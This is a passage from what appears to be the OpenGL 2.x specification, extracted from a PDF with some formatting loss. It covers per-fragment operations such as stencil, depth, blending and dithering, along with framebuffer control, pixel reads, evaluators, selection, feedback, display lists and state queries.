INCR, DECR, INVERT, INCR WRAP, and DECR WRAP.These correspond to keeping the current value, setting to zero, replacing with thereference value, incrementing with saturation, decrementing with saturation, bit-wise inverting it, incrementing without saturation, and decrementing without satu-ration. For purposes of increment and decrement, the stencil bits are considered as anunsigned integer. Incrementing or decrementing with saturation clamps the stencilvalue at 0 and the maximum representable value. Incrementing or decrementingwithout saturation will wrap such that incrementing the maximum representablevalue results in 0, and decrementing 0 results in the maximum representable value. The same symbolic values are given to indicate the stencil action if the depthbuffer test (see section 4.1.6) fails (dpfail), or if it passes (dppass). If the stencil test fails, the incoming fragment is discarded. The state requiredconsists of the most recent values passed to StencilFunc or StencilFuncSeparateand to StencilOp or StencilOpSeparate, and a bit indicating whether stencil test-ing is enabled or disabled. In the initial state, stenciling is disabled, the front andback stencil reference value are both zero, the front and back stencil comparisonfunctions are both ALWAYS, and the front and back stencil mask are both all ones.Initially, all three front and back stencil operations are KEEP. If there is no stencil buffer, no stencil modification can occur, and it is as if thestencil tests always pass, regardless of any calls to StencilFunc. fied as indicated below as if the depth buffer test passed. If enabled, the comparisontakes place and the depth buffer and stencil value may subsequently be modified. The comparison is specified with This command takes a single symbolic constant: one of NEVER, ALWAYS, LESS,LEQUAL, EQUAL, GREATER, GEQUAL, NOTEQUAL. Accordingly, the depth buffertest passes never, always, if the incoming fragment’s zw value is less than, lessthan or equal to, equal to, greater than, greater than or equal to, or not equal tothe depth value stored at the location given by the incoming fragment’s (xw , yw )coordinates. If the depth buffer test fails, the incoming fragment is discarded. The stencilvalue at the fragment’s (xw , yw ) coordinates is updated according to the functioncurrently in effect for depth buffer test failure. Otherwise, the fragment continuesto the next operation and the value of the depth buffer at the fragment’s (xw , yw )location is set to the fragment’s zw value. In this case the stencil value is updatedaccording to the function currently in effect for depth buffer test success. The necessary state is an eight-valued integer and a single bit indicatingwhether depth buffering is enabled or disabled. In the initial state the functionis LESS and the test is disabled. If there is no depth buffer, it is as if the depth buffer test always passes. where target is SAMPLES PASSED. If BeginQuery is called with an unused id, thatname is marked as used and associated with a new query object. BeginQuery with a target of SAMPLES PASSED resets the current samples-passed count to zero and sets the query active state to TRUE and the active queryid to id. EndQuery with a target of SAMPLES PASSED initializes a copy of thecurrent samples-passed count into the active occlusion query object’s results value,sets the active occlusion query object’s result available to FALSE, sets the queryactive state to FALSE, and the active query id to 0. 4.1.8 BlendingBlending combines the incoming source fragment’s R, G, B, and A values withthe destination R, G, B, and A values stored in the framebuffer at the fragment’s(xw , yw ) location. Source and destination values are combined according to the blend equation,quadruplets of source and destination weighting factors determined by the blendfunctions, and a constant blend color to obtain a new set of R, G, B, and A values,as described below. Each of these floating-point values is clamped to [0, 1] andconverted back to a fixed-point value in the manner described in section 2.14.9.The resulting four values are sent to the next operation. Blending is dependent on the incoming fragment’s alpha value and that of thecorresponding currently stored pixel. Blending applies only in RGBA mode; incolor index mode it is bypassed. Blending is enabled or disabled using Enable orDisable with the symbolic constant BLEND. If it is disabled, or if logical operationon color values is enabled (section 4.1.10), proceed to the next operation. If multiple fragment colors are being written to multiple buffers (see sec-tion 4.2.1), blending is computed and applied separately for each fragment colorand the corresponding buffer. Blend EquationBlending is controlled by the blend equations, defined by the commands Blend Functions The weighting factors used by the blend equation are determined by the blendfunctions. Blend functions are specified with the commands Table 4.2: RGB and ALPHA source and destination blending functions and thecorresponding blend factors. Addition and subtraction of triplets is performedcomponent-wise.1 SRC ALPHA SATURATE is valid only for source RGB and alpha blending func- tions.2 f = min(A , 1 − A ). s d Blend ColorThe constant color Cc to be used in blending is specified with the command The four parameters are clamped to the range [0, 1] before being stored. Theconstant color can be used in both the source and destination blending functions Blending State The state required for blending is two integers for the RGB and alpha blend equa-tions, four integers indicating the source and destination RGB and alpha blendingfunctions, four floating-point values to store the RGBA constant blend color, and abit indicating whether blending is enabled or disabled. The initial blend equationsfor RGB and alpha are both FUNC ADD. The initial blending functions are ONE forthe source RGB and alpha functions and ZERO for the destination RGB and alphafunctions. The initial constant blend color is (R, G, B, A) = (0, 0, 0, 0). Initially,blending is disabled. Blending occurs once for each color buffer currently enabled for writing (sec-tion 4.2.1) using each buffer’s color for Cd . If a color buffer has no A value, thenAd is taken to be 1. 4.1.9 Dithering Dithering selects between two color values or indices. In RGBA mode, considerthe value of any of the color components as a fixed-point value with m bits to theleft of the binary point, where m is the number of bits allocated to that componentin the framebuffer; call each such value c. For each c, dithering selects a valuec1 such that c1 ∈ {max{0, dce − 1}, dce} (after this selection, treat c1 as a fixedpoint value in [0,1] with m bits). This selection may depend on the xw and ywcoordinates of the pixel. In color index mode, the same rule applies with c being asingle color index. c must not be larger than the maximum value representable inthe framebuffer for either the component or the index, as appropriate. Many dithering algorithms are possible, but a dithered value produced by anyalgorithm must depend only the incoming value and the fragment’s x and y windowcoordinates. If dithering is disabled, then each color component is truncated to afixed-point value with as many bits as there are in the corresponding component inthe framebuffer; a color index is rounded to the nearest integer representable in thecolor index portion of the framebuffer. Dithering is enabled with Enable and disabled with Disable using the symbolicconstant DITHER. The state required is thus a single bit. Initially, dithering isenabled. Stencil, depth, blending, and dithering operations are performed for a pixelsample only if that sample’s fragment coverage bit is a value of 1. If the corre-sponding coverage bit is 0, no operations are performed for that sample. If MULTISAMPLE is disabled, and the value of SAMPLE BUFFERS is one, thefragment may be treated exactly as described above, with optimization possiblebecause the fragment coverage must be set to full coverage. Further optimization isallowed, however. An implementation may choose to identify a centermost sample,and to perform alpha, stencil, and depth tests on only that sample. Regardless ofthe outcome of the stencil test, all multisample buffer stencil sample values are setto the appropriate new stencil value. If the depth test passes, all multisample bufferdepth sample values are set to the depth of the fragment’s centermost sample’sdepth value, and all multisample buffer color sample values are set to the colorvalue of the incoming fragment. Otherwise, no change is made to any multisamplebuffer color or depth value. After all operations have been completed on the multisample buffer, the samplevalues for each color in the multisample buffer are combined to produce a singlecolor value, and that value is written into the corresponding color buffers selectedby DrawBuffer or DrawBuffers. An implementation may defer the writing of thecolor buffers until a later time, but the state of the framebuffer must behave as if the color buffers were updated as each fragment was processed. The method ofcombination is not specified, though a simple average computed independently foreach color component is recommended. defines the set of color buffers to which fragment color zero is written. buf is asymbolic constant specifying zero, one, two, or four buffers for writing. The con-stants are NONE, FRONT LEFT, FRONT RIGHT, BACK LEFT, BACK RIGHT, FRONT,BACK, LEFT, RIGHT, FRONT AND BACK, and AUX0 through AUXm, where m + 1 isthe number of available auxiliary buffers. The constants refer to the four potentially visible buffers front left, front right,back left, and back right, and to the auxiliary buffers. Arguments other than AUXithat omit reference to LEFT or RIGHT refer to both left and right buffers. Argu-ments other than AUXi that omit reference to FRONT or BACK refer to both front andback buffers. AUXi enables drawing only to auxiliary buffer i. Each AUXi adheresto AUXi = AUX0 + i. The constants and the buffers they indicate are summarizedin table 4.4. If DrawBuffer is is supplied with a constant (other than NONE) thatdoes not indicate any of the color buffers allocated to the GL context, the errorINVALID OPERATION results. DrawBuffer will set the draw buffer for fragment colors other than zero toNONE. The command Table 4.4: Arguments to DrawBuffer and the buffers that they indicate. defines the draw buffers to which all fragment colors are written. n specifies thenumber of buffers in bufs. bufs is a pointer to an array of symbolic constantsspecifying the buffer to which each fragment color is written. The constants may beNONE, FRONT LEFT, FRONT RIGHT, BACK LEFT, BACK RIGHT, and AUX0 throughAUXm, where m + 1 is the number of available auxiliary buffers. The draw buffersbeing defined correspond in order to the respective fragment colors. The drawbuffer for fragment colors beyond n is set to NONE. Except for NONE, a buffer may not appear more then once in the arraypointed to by bufs. Specifying a buffer more then once will result in the errorINVALID OPERATION. If fixed-function fragment shading is being performed, DrawBuffers specifiesa set of draw buffers into which the fragment color is written. If a fragment shader writes to gl FragColor, DrawBuffers specifies a setof draw buffers into which the single fragment color defined by gl FragColoris written. If a fragment shader writes to gl FragData, DrawBuffers specifiesa set of draw buffers into which each of the multiple fragment colors definedby gl FragData are separately written. If a fragment shader writes to neithergl FragColor nor gl FragData, the values of the fragment colors followingshader execution are undefined, and may differ for each fragment color. The maximum number of draw buffers is implementation dependent and mustbe at least 1. The number of draw buffers supported can be queried by callingGetIntegerv with the symbolic constant MAX DRAW BUFFERS. The constants FRONT, BACK, LEFT, RIGHT, and FRONT AND BACK are not valid in the bufs array passed to DrawBuffers, and will result in the errorINVALID OPERATION. This restriction is because these constants may themselvesrefer to multiple buffers, as shown in table 4.4. If DrawBuffers is supplied with a constant (other than NONE) that doesnot indicate any of the color buffers allocated to the GL context, the errorINVALID OPERATION will be generated. If n is greater than the value ofMAX DRAW BUFFERS, the error INVALID VALUE will be generated. Indicating a buffer or buffers using DrawBuffer or DrawBuffers causes sub-sequent pixel color value writes to affect the indicated buffers. Specifying NONE as the draw buffer for an fragment color will inhibit that frag-ment color from being written to any buffer. Monoscopic contexts include only left buffers, while stereoscopic contexts in-clude both left and right buffers. Likewise, single buffered contexts include onlyfront buffers, while double buffered contexts include both front and back buffers.The type of context is selected at GL initialization. The state required to handle color buffer selection is an integer for each sup-ported fragment color. In the initial state, the draw buffer for fragment color zerois FRONT if there are no back buffers; otherwise it is BACK. The initial state of drawbuffers for fragment colors other then zero is NONE. control the color buffer or buffers (depending on which buffers are currently indi-cated for writing). The least significant n bits of mask, where n is the number ofbits in a color index buffer, specify a mask. Where a 1 appears in this mask, thecorresponding bit in the color index buffer (or buffers) is written; where a 0 ap-pears, the bit is not written. This mask applies only in color index mode. In RGBAmode, ColorMask is used to mask the writing of R, G, B and A values to the colorbuffer or buffers. r, g, b, and a indicate whether R, G, B, or A values, respectively,are written or not (a value of TRUE means that the corresponding value is written).In the initial state, all bits (in color index mode) and all color values (in RGBAmode) are enabled for writing. The depth buffer can be enabled or disabled for writing zw values using If mask is non-zero, the depth buffer is enabled for writing; otherwise, it is disabled.In the initial state, the depth buffer is enabled for writing. The commands sets the clear value for the color buffers in RGBA mode. Each of the specifiedcomponents is clamped to [0, 1] and converted to fixed-point according to the rulesof section 2.14.9. sets the clear color index. index is converted to a fixed-point value with unspecifiedprecision to the left of the binary point; the integer part of this value is then maskedwith 2m − 1, where m is the number of bits in a color index value stored in theframebuffer. takes a floating-point value that is clamped to the range [0, 1] and converted tofixed-point according to the rules for a window z value given in section 2.11.1.Similarly, takes a single integer argument that is the value to which to clear the stencil buffer.s is masked to the number of bitplanes in the stencil buffer. takes four floating-point arguments that are the values, in order, to which to set theR, G, B, and A values of the accumulation buffer (see the next section). Thesevalues are clamped to the range [−1, 1] when they are specified. When Clear is called, the only per-fragment operations that are applied (ifenabled) are the pixel ownership test, the scissor test, and dithering. The maskingoperations described in the last section (4.2.2) are also effective. If a buffer is notpresent, then a Clear directed at that buffer has no effect. The state required for clearing is a clear value for each of the color buffer, thedepth buffer, the stencil buffer, and the accumulation buffer. Initially, the RGBAcolor clear value is (0,0,0,0), the clear color index is 0, and the stencil buffer andaccumulation buffer clear values are all 0. The depth buffer clear value is initially1.0. The RETURN operation takes each color value from the accumulation buffer,multiplies each of the R, G, B, and A components by value, and clamps the re-sults to the range [0, 1] The resulting color value is placed in the buffers currentlyenabled for color writing as if it were a fragment produced from rasterization, ex-cept that the only per-fragment operations that are applied (if enabled) are the pixelownership test, the scissor test (section 4.1.2), and dithering (section 4.1.9). Colormasking (section 4.2.2) is also applied. The MULT operation multiplies each R, G, B, and A in the accumulation bufferby value and then returns the scaled color components to their corresponding ac-cumulation buffer locations. ADD is the same as MULT except that value is added toeach of the color components. The color components operated on by Accum must be clamped only if theoperation is RETURN. In this case, a value sent to the enabled color buffers is firstclamped to [0, 1]. Otherwise, results are undefined if the result of an operation ona color component is out of the range [−1, 1]. If there is no accumulation buffer, or if the GL is in color index mode, Accumgenerates the error INVALID OPERATION. No state (beyond the accumulation buffer itself) is required for accumulationbuffering. ignored. The error INVALID OPERATION results if there is no stencil buffer. convert to float color table lookup convert Pixel Storage RGB to L Operations clamp mask to to [0,1] (2n − 1) pack takes a symbolic constant as argument. The possible values are FRONT LEFT,FRONT RIGHT, BACK LEFT, BACK RIGHT, FRONT, BACK, LEFT, RIGHT, and AUX0through AUXn. FRONT and LEFT refer to the front left buffer, BACK refers to theback left buffer, and RIGHT refers to the front right buffer. The other constants cor-respond directly to the buffers that they name. If the requested buffer is missing,then the error INVALID OPERATION is generated. The initial setting for Read-Buffer is FRONT if there is no back buffer and BACK otherwise. ReadPixels obtains values from the selected buffer from each pixel with lowerleft hand corner at (x + i, y + j) for 0 ≤ i < width and 0 ≤ j < height; this pixelis said to be the ith pixel in the jth row. If any of these pixels lies outside of thewindow allocated to the current GL context, the values obtained for those pixelsare undefined. Results are also undefined for individual pixels that are not ownedby the current context. Otherwise, ReadPixels obtains values from the selectedbuffer, regardless of how those values were placed there. If the GL is in RGBA mode, and format is one of RED, GREEN, BLUE, ALPHA,RGB, RGBA, BGR, BGRA, LUMINANCE, or LUMINANCE ALPHA, then red, green, blue,and alpha values are obtained from the selected buffer at each pixel location.If the framebuffer does not support alpha values then the A that is obtained is1.0. If format is COLOR INDEX and the GL is in RGBA mode then the errorINVALID OPERATION occurs. If the GL is in color index mode, and format isnot DEPTH COMPONENT or STENCIL INDEX, then the color index is obtained ateach pixel location. Conversion to LThis step applies only to RGBA component groups, and only if the format is eitherLUMINANCE or LUMINANCE ALPHA. A value L is computed as L=R+G+B where R, G, and B are the values of the R, G, and B components. The singlecomputed L component replaces the R, G, and B components in the group. Final ConversionFor an index, if the type is not FLOAT, final conversion consists of masking theindex with the value given in table 4.6; if the type is FLOAT, then the integer indexis converted to a GL float data value. For an RGBA color, each component is first clamped to [0, 1]. Then theappropriate conversion formula from table 4.7 is applied to the component. Table 4.6: Index masks used by ReadPixels. Floating point data are not masked. the pixels are packed into the buffer relative to this offset; otherwise, data is apointer to a block client memory and the pixels are packed into the client memoryrelative to the pointer. If a pixel pack buffer object is bound and packing the pixeldata according to the pixel pack storage state would access memory beyond the sizeof the pixel pack buffer’s memory size, an INVALID OPERATION error results. Ifa pixel pack buffer object is bound and data is not evenly divisible by the numberof basic machine units needed to store in memory the corresponding GL data typefrom table 3.5 for the type parameter, an INVALID OPERATION error results. Groups of elements are placed in memory just as they are taken from mem-ory for DrawPixels. That is, the ith group of the jth row (corresponding to theith pixel in the jth row) is placed in memory just where the ith group of the jthrow would be taken from for DrawPixels. See Unpacking under section 3.6.4.The only difference is that the storage mode parameters whose names begin withPACK are used instead of those whose names begin with UNPACK . If the formatis RED, GREEN, BLUE, ALPHA, or LUMINANCE, only the corresponding single ele-ment is written. Likewise if the format is LUMINANCE ALPHA, RGB, or BGR, onlythe corresponding two or three elements are written. Otherwise all the elements ofeach group are written. Table 4.7: Reversed component conversions, used when component data are beingreturned to client memory. Color, normal, and depth components are convertedfrom the internal floating-point representation (f ) to a datum of the specified GLdata type (c) using the specified equation. All arithmetic is done in the internalfloating point format. These conversions apply to component data returned by GLquery commands and to components of pixel data returned to client memory. Theequations remain the same even if the implemented ranges of the GL data types aregreater than the minimum required ranges. (See table 2.2.) Equations with N asthe exponent are performed for each bitfield of the packed data type, with N set tothe number of bits in the bitfield. convert to float color table lookup respectively. The first four arguments have the same interpretation as the corre-sponding arguments to ReadPixels. Values are obtained from the framebuffer, converted (if appropriate), then sub-jected to the pixel transfer operations described in section 3.6.5, just as if Read-Pixels were called with the corresponding arguments. If the type is STENCILor DEPTH, then it is as if the format for ReadPixels were STENCIL INDEX orDEPTH COMPONENT, respectively. If the type is COLOR, then if the GL is in RGBAmode, it is as if the format were RGBA, while if the GL is in color index mode, it isas if the format were COLOR INDEX. The groups of elements so obtained are then written to the framebuffer just asif DrawPixels had been given width and height, beginning with final conversionof elements. The effective format is the same as that already described. Special Functions This chapter describes additional GL functionality that does not fit easily into anyof the preceding chapters. This functionality consists of evaluators (used to modelcurves and surfaces), selection (used to locate rendered primitives on the screen),feedback (which returns GL results before rasterization), display lists (used to des-ignate a group of GL commands for later execution by the GL), flushing and fin-ishing (used to synchronize the GL command stream), and hints. 5.1 EvaluatorsEvaluators provide a means to use a polynomial or rational polynomial mappingto produce vertex, normal, and texture coordinates, and colors. The values so pro-duced are sent on to further stages of the GL as if they had been provided directlyby the client. Transformations, lighting, primitive assembly, rasterization, and per-pixel operations are not affected by the use of evaluators. Consider the Rk -valued polynomial p(u) defined by n X p(u) = Bin (u)Ri (5.1) i=0 with Ri ∈ Rk and ! n i Bin (u) = u (1 − u)n−i , i nthe ith Bernstein polynomial of degree n (recall that 00 ≡ 1 and 0 ≡ 1). EachRi is a control point. The relevant command is 2305.1. EVALUATORS 231 target k Values MAP1 VERTEX 3 3 x, y, z vertex coordinates MAP1 VERTEX 4 4 x, y, z, w vertex coordinates MAP1 INDEX 1 color index MAP1 COLOR 4 4 R, G, B, A MAP1 NORMAL 3 x, y, z normal coordinates MAP1 TEXTURE COORD 1 1 s texture coordinate MAP1 TEXTURE COORD 2 2 s, t texture coordinates MAP1 TEXTURE COORD 3 3 s, t, r texture coordinates MAP1 TEXTURE COORD 4 4 s, t, r, q texture coordinates Table 5.1: Values specified by the target to Map1. Values are given in the order inwhich they are taken. target is a symbolic constant indicating the range of the defined polynomial. Itspossible values, along with the evaluations that each indicates, are given in ta-ble 5.1. order is equal to n + 1; The error INVALID VALUE is generated if orderis less than one or greater than MAX EVAL ORDER. points is a pointer to a set ofn + 1 blocks of storage. Each block begins with k single-precision floating-pointor double-precision floating-point values, respectively. The rest of the block maybe filled with arbitrary data. Table 5.1 indicates how k depends on target and whatthe k values represent in each case. stride is the number of single- or double-precision values (as appropriate) ineach block of storage. The error INVALID VALUE results if stride is less thank. The order of the polynomial, order, is also the number of blocks of storagecontaining control points. u1 and u2 give two floating-point values that define the endpoints of the pre-image of the map. When a value u0 is presented for evaluation, the formula usedis u0 − u1 p0 (u0 ) = p( ). u2 − u1The error INVALID VALUE results if u1 = u2 . Map2 is analogous to Map1, except that it describes bivariate polynomials ofthe form n X X m p(u, v) = Bin (u)Bjm (v)Rij . i=0 j=0 Integers Reals Vertices k [u1,u2] Normals ΣBiRi EvalMesh [0,1] Ax+b Texture Coordinates EvalPoint l [v1,v2] [0,1] Colors MapGrid Map EvalCoord target is a range type selected from the same group as is used for Map1, ex-cept that the string MAP1 is replaced with MAP2. points is a pointer to (n +1)(m + 1) blocks of storage (uorder = n + 1 and vorder = m + 1; the er-ror INVALID VALUE is generated if either uorder or vorder is less than one orgreater than MAX EVAL ORDER). The values comprising Rij are located (ustride)i + (vstride)j u0 − u1 v 0 − v1 p0 (u0 , v 0 ) = p( , ). u2 − u1 v2 − v1 The evaluation of a defined map is enabled or disabled with Enable andDisable using the constant corresponding to the map as described above. Theevaluator map generates only coordinates for texture unit TEXTURE0. The errorINVALID VALUE results if either ustride or vstride is less than k, or if u1 is equalto u2, or if v1 is equal to v2 . If the value of ACTIVE TEXTURE is not TEXTURE0,calling Map{12} generates the error INVALID OPERATION. Figure 5.1 describes map evaluation schematically; an evaluation of enabledmaps is effected in one of two ways. The first way is to use ∂q ∂q m= × . ∂u ∂vThen the generated analytic normal, n, is given by n = m if a vertex shader is mactive, or else by n = kmk . The second way to carry out evaluations is to use a set of commands that pro-vide for efficient specification of a series of evenly spaced values to be mapped.This method proceeds in two steps. The first step is to define a grid in the domain. for a two-dimensional map. In the case of MapGrid1 u01 and u02 describe aninterval, while n describes the number of partitions of the interval. The errorINVALID VALUE results if n ≤ 0. For MapGrid2, (u01 , v10 ) specifies one two-dimensional point and (u02 , v20 ) specifies another. nu gives the number of partitionsbetween u01 and u02 , and nv gives the number of partitions between v10 and v20 . Ifeither nu ≤ 0 or nv ≤ 0, then the error INVALID VALUE occurs. Once a grid is defined, an evaluation on a rectangular subset of that grid maybe carried out by calling mode is either POINT or LINE. The effect is the same as performing the followingcode fragment, with ∆u0 = (u02 − u01 )/n: Begin(type); for i = p1 to p2 step 1.0 EvalCoord1(i * ∆u0 + u01 ); End(); mode must be FILL, LINE, or POINT. When mode is FILL, then these commandsare equivalent to the following, with ∆u0 = (u02 − u01 )/n and ∆v 0 = (v20 − v10 )/m: Begin(POINTS); for i = q1 to q2 step 1.0 for j = p1 to p2 step 1.0 EvalCoord2(j * ∆u0 + u01 , i * ∆v 0 + v10 ); End(); Again, in all three cases, there is the requirement that 0 ∗ ∆u0 + u01 = u01 , n ∗ ∆u0 +u01 = u02 , 0 ∗ ∆v 0 + v10 = v10 , and m ∗ ∆v 0 + v10 = v20 . An evaluation of a single point on the grid may also be carried out: 5.2 SelectionSelection is used to determine which primitives are drawn into some region of awindow. The region is defined by the current model-view and perspective matrices. Selection works by returning an array of integer-valued names. This arrayrepresents the current contents of the name stack. This stack is controlled with thecommands void InitNames( void ); void PopName( void ); void PushName( uint name ); void LoadName( uint name );InitNames empties (clears) the name stack. PopName pops one name off the topof the name stack. PushName causes name to be pushed onto the name stack. LoadName replaces the value on the top of the stack with name. Loading a nameonto an empty stack generates the error INVALID OPERATION. Popping a name offof an empty stack generates STACK UNDERFLOW; pushing a name onto a full stackgenerates STACK OVERFLOW. The maximum allowable depth of the name stack isimplementation dependent but must be at least 64. In selection mode, framebuffer updates as described in chapter 4 are not per-formed. The GL is placed in selection mode with written. The minimum and maximum (each of which lies in the range [0, 1]) areeach multiplied by 232 −1 and rounded to the nearest unsigned integer to obtain thevalues that are placed in the hit record. No depth offset arithmetic (section 3.5.5)is performed on these values. Hit records are placed in the selection array by maintaining a pointer into thatarray. When selection mode is entered, the pointer is initialized to the beginningof the array. Each time a hit record is copied, the pointer is updated to point atthe array element after the one into which the topmost element of the name stackwas stored. If copying the hit record into the selection array would cause the totalnumber of values to exceed n, then as much of the record as fits in the array iswritten and an overflow flag is set. Selection mode is exited by calling RenderMode with an argument value otherthan SELECT. When called while in selection mode, RenderMode returns thenumber of hit records copied into the selection array and resets the SelectBufferpointer to its last specified value. Values are not guaranteed to be written into theselection array until RenderMode is called. If the selection array overflow flagwas set, then RenderMode returns −1 and clears the overflow flag. The namestack is cleared and the stack pointer reset whenever RenderMode is called. The state required for selection consists of the address of the selection arrayand its maximum size, the name stack and its associated pointer, a minimum andmaximum depth value, and several flags. One flag indicates the current Render-Mode value. In the initial state, the GL is in the RENDER mode. Another flag isused to indicate whether or not a hit has occurred since the last name stack ma-nipulation. This flag is reset upon entering selection mode and whenever a namestack manipulation takes place. One final flag is required to indicate whether themaximum number of copied names would have been exceeded. This flag is resetupon entering selection mode. This flag, the address of the selection array, and itsmaximum size are GL client state. 5.3 FeedbackThe GL is placed in feedback mode by calling RenderMode with FEEDBACK.When in feedback mode, framebuffer updates as described in chapter 4 are notperformed. Instead, information about primitives that would have otherwise beenrasterized is returned to the application via the feedback buffer. Feedback is controlled using feedback-list: feedback-item feedback-list pixel-rectangle: feedback-item DRAW PIXEL TOKEN vertex COPY PIXEL TOKEN vertexfeedback-item: passthrough: point PASS THROUGH TOKEN f line-segment polygon vertex: bitmap 2D: pixel-rectangle ff passthrough 3D: fffpoint: 3D COLOR: POINT TOKEN vertex f f f colorline-segment: 3D COLOR TEXTURE: LINE TOKEN vertex vertex f f f color tex LINE RESET TOKEN vertex vertex 4D COLOR TEXTURE:polygon: f f f f color tex POLYGON TOKEN n polygon-specpolygon-spec: color: polygon-spec vertex ffff vertex vertex vertex fbitmap: BITMAP TOKEN vertex tex: ffff state. When such a command is accumulated into the display list (that is, whenissued, not when executed), the client state in effect at that time applies to the com-mand. Only server state is affected when the command is executed. As always,pointers which are passed as arguments to commands are dereferenced when thecommand is issued. (Vertex array pointers are dereferenced when the commandsArrayElement, DrawArrays, DrawElements, or DrawRangeElements are ac-cumulated into a display list.) A display list is begun by calling n is a positive integer to which the display list that follows is assigned, and mode is asymbolic constant that controls the behavior of the GL during display list creation.If mode is COMPILE, then commands are not executed as they are placed in thedisplay list. If mode is COMPILE AND EXECUTE then commands are executed asthey are encountered, then placed in the display list. If n = 0, then the errorINVALID VALUE is generated. After calling NewList all subsequent GL commands are placed in the displaylist (in the order the commands are issued) until a call to occurs, after which the GL returns to its normal command execution state. It isonly when EndList occurs that the specified display list is actually associated withthe index indicated with NewList. The error INVALID OPERATION is generatedif EndList is called without a previous matching NewList, or if NewList is calleda second time before calling EndList. The error OUT OF MEMORY is generated ifEndList is called and the specified display list cannot be stored because insufficientmemory is available. In this case GL implementations of revision 1.1 or greaterinsure that no change is made to the previous contents of the display list, if any,and that no other change is made to the GL state, except for the state changed byexecution of GL commands when the display list mode is COMPILE AND EXECUTE. Once defined, a display list is executed by calling n gives the index of the display list to be called. This causes the commands savedin the display list to be executed, in order, just as if they were issued without usinga display list. If n = 0, then the error INVALID VALUE is generated. The command returns an integer n such that the indices n, . . . , n+s−1 are previously unused (i.e.there are s previously unused display list indices starting at n). GenLists also has the effect of creating an empty display list for each of the indices n, . . . , n + s − 1,so that these indices all become used. GenLists returns 0 if there is no group of scontiguous previously unused display list indices, or if s = 0. where list is the index of the first display list to be deleted and range is the numberof display lists to be deleted. All information about the display lists is lost, and theindices become unused. Indices to which no display list corresponds are ignored.If range = 0, nothing happens. Certain commands, when called while compiling a display list, are not com-piled into the display list but are executed immediately. These commands fall inseveral categories including Display lists: GenLists and DeleteLists. Render modes: FeedbackBuffer, SelectBuffer, and RenderMode. Vertex arrays: ClientActiveTexture, ColorPointer, EdgeFlagPointer, Fog-CoordPointer, IndexPointer, InterleavedArrays, NormalPointer, Secondary-ColorPointer, TexCoordPointer, VertexAttribPointer, and VertexPointer. Client state: EnableClientState, DisableClientState, EnableVertexAttrib-Array, DisableVertexAttribArray, PushClientAttrib, and PopClientAttrib. Pixels and textures: PixelStore, ReadPixels, GenTextures, DeleteTextures,and AreTexturesResident. Occlusion queries: GenQueries and DeleteQueries. Vertex buffer objects: GenBuffers, DeleteBuffers, BindBuffer, BufferData,BufferSubData, MapBuffer, and UnmapBuffer. Program and shader objects: CreateProgram, CreateShader, DeletePro-gram, DeleteShader, AttachShader, DetachShader, BindAttribLocation,CompileShader, ShaderSource, LinkProgram, and ValidateProgram. GL command stream management: Finish and Flush. Other queries: All query commands whose names begin with Get and Is (seechapter 6). GL commands that source data from buffer objects dereference the buffer ob-ject data in question at display list compile time, rather than encoding the bufferID and buffer offset into the display list. Only GL commands that are executedimmediately, rather than being compiled into a display list, are permitted to use abuffer object as a data sink. indicates that all commands that have previously been sent to the GL must completein finite time. The command forces all previous GL commands to complete. Finish does not return until alleffects from previously issued commands on GL client and server state and theframebuffer are fully realized. 5.6 HintsCertain aspects of GL behavior, when there is room for variation, may be controlledwith hints. A hint is specified using The state required to describe the GL machine is enumerated in section 6.2. Moststate is set through the calls described in previous chapters, and can be queriedusing the calls described in section 6.1. can be used to determine if value is currently enabled (as with Enable) or disabled. 247248 CHAPTER 6. STATE AND STATE REQUESTS GetFloatv(MODELVIEW MATRIX,m); m = mT ; 6.16, 6.19, and 6.34 indicate those state variables which are qualified byACTIVE TEXTURE or CLIENT ACTIVE TEXTURE during state queries. Queriesof texture state variables corresponding to texture coordinate processingunits (namely, TexGen state and enables, and matrices) will generate anINVALID OPERATION error if the value of ACTIVE TEXTURE is greater than orequal to MAX TEXTURE COORDS. All other texture state queries will result in anINVALID OPERATION error if the value of ACTIVE TEXTURE is greater than orequal to MAX COMBINED TEXTURE IMAGE UNITS. GetClipPlane always returns four double-precision values in eqn; these are thecoefficients of the plane equation of plane in eye coordinates (these coordinatesare those that were computed when the plane was specified). GetLight places information about value (a symbolic constant) for light (also asymbolic constant) in data. POSITION or SPOT DIRECTION returns values in eyecoordinates (again, these are the coordinates that were computed when the positionor direction was specified). GetMaterial, GetTexGen, GetTexEnv, GetTexParameter, and GetBuffer-Parameter are similar to GetLight, placing information about value for the targetindicated by their first argument into data. The face argument to GetMaterialmust be either FRONT or BACK, indicating the front or back material, respectively.The env argument to GetTexEnv must be either POINT SPRITE, TEXTURE ENV, is used to obtain texture images. It is somewhat different from the other get com-mands; tex is a symbolic value indicating which texture (or texture face in the caseof a cube map texture target name) is to be obtained. TEXTURE 1D, TEXTURE 2D,and TEXTURE 3D indicate a one-, two-, or three-dimensional texture respectively,while TEXTURE CUBE MAP POSITIVE X, TEXTURE CUBE MAP NEGATIVE X,TEXTURE CUBE MAP POSITIVE Y, TEXTURE CUBE MAP NEGATIVE Y,TEXTURE CUBE MAP POSITIVE Z, and TEXTURE CUBE MAP NEGATIVE Z indi-cate the respective face of a cube map texture. lod is a level-of-detail number,format is a pixel format from table 3.6, type is a pixel type from table 3.5. GetTexImage obtains component groups from a texture image with theindicated level-of-detail. Calling GetTexImage with a color format (oneof RED, GREEN, BLUE, ALPHA, RGB, BGR, RGBA, BGRA, LUMINANCE, or LUMINANCE ALPHA) when the base internal format of the texture image is not acolor format, or with a format of DEPTH COMPONENT when the base internal formatis not a depth format, causes the error INVALID OPERATION. If the base internalformat is a color format then the components are assigned among R, G, B, and Aaccording to table 6.1, starting with the first group in the first row, and continuingby obtaining groups in order from each row and proceeding from the first row tothe last, and from the first image to the last for three-dimensional textures. If thebase internal format is DEPTH COMPONENT, then each depth component is assignedwith the same ordering of rows and images. These groups are then packed andplaced in client or pixel buffer object memory. If a pixel pack buffer is bound (asindicated by a non-zero value of PIXEL PACK BUFFER BINDING), img is an offsetinto the pixel pack buffer; otherwise, img is a pointer to client memory. No pixeltransfer operations are performed on this image, but pixel storage modes that areapplicable to ReadPixels are applied. For three-dimensional textures, pixel storage operations are applied as if theimage were two-dimensional, except that the additional pixel storage state valuesPACK IMAGE HEIGHT and PACK SKIP IMAGES are applied. The correspondenceof texels to memory locations is as defined for TexImage3D in section 3.8.1. The row length, number of rows, image depth, and number of images are de-termined by the size of the texture image (including any borders). Calling GetTex-Image with lod less than zero or larger than the maximum allowable causes theerror INVALID VALUE. Calling GetTexImage with a format of COLOR INDEX orSTENCIL INDEX causes the error INVALID ENUM. If a pixel pack buffer objectis bound and packing the texture image into 